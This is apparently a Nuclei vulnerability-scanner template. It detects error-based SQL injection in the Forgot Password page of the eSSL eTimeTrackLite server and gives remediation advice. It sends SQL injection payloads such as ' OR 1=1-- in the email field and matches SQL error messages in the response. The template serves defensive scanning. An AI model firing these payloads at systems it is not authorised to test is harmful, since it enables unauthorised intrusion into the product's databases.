id: error-based-sql-injection-essl-time-trackLite-server

info:
  name: Error Based SQL Injection in essl-time-trackLite-server
  author: brownstan
  severity: high
  description: |
    This template detects SQL Injection vulnerabilities in the "Forgot Password" functionality in essl-time-trackLite-server by looking for SQL error messages in the response.
  remediation: |
    Input Validation:
    Implement strict input validation to ensure only expected and safe data is processed by the application.
    Use whitelisting techniques to allow only acceptable input values.
    Use parameterized queries (prepared statements) to prevent SQL injection by separating SQL code from user input.
    Ensure all database queries are parameterized, avoiding dynamic SQL queries wherever possible.
  reference:
    - https://medium.com/@yashrd1209/zero-day-sqli-with-data-dump-in-essl-etimetracklite-server-7250932d0316
  classification:
   cwe-id: CWE-89
  metadata:
    verified: true
  tags: sql, sqli, injection, web, forgotpassword

requests:
  - raw:
      - |
        GET /ForgotPassword.aspx HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en-GB
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Referer: {{BaseURL}}/Default.aspx
        Accept-Encoding: gzip, deflate, br
        Connection: keep-alive

      - |
        POST /ForgotPassword.aspx HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Accept-Language: en-GB
        Upgrade-Insecure-Requests: 1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Referer: {{BaseURL}}/ForgotPassword.aspx?
        Accept-Encoding: gzip, deflate, br
        Content-Length: 145

        __VIEWSTATE={{url_encode(viewstate)}}&__VIEWSTATEGENERATOR={{url_encode(viewstategenerator)}}&txt_EmailId={{url_encode(email)}}&btnSave=Submit

    extractors:
      - type: xpath
        part: body
        name: viewstate
        internal: true
        xpath:
          - "//input[@id='__VIEWSTATE']/@value"
      - type: xpath
        part: body
        name: viewstategenerator
        internal: true
        xpath:
          - "//input[@id='__VIEWSTATEGENERATOR']/@value"

    payloads:
      email:
        - "'"
        - "' OR 1=1--"
        - "' OR 'a'='a"
        - "' OR '1'='1"
        - "' OR ''='"


    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "Error:-Incorrect syntax near"
          - "SQL syntax"
          - "sql error"
          - "mysql_fetch"
          - "ORA-01756"
          - "Unclosed quotation mark"
          - "SQLSTATE"
          - "Warning: mysql"
          - "Warning: mysqli"
          - "You have an error in your SQL syntax"
          - "PostgreSQL query failed"
          - "unterminated quoted string"

      - type: regex
        part: body
        regex:
          - "(?i)(sql syntax error|unclosed quotation mark|ORA-01756|SQLSTATE|Warning: mysql|Warning: mysqli|You have an error in your SQL syntax|PostgreSQL query failed|unterminated quoted string)"
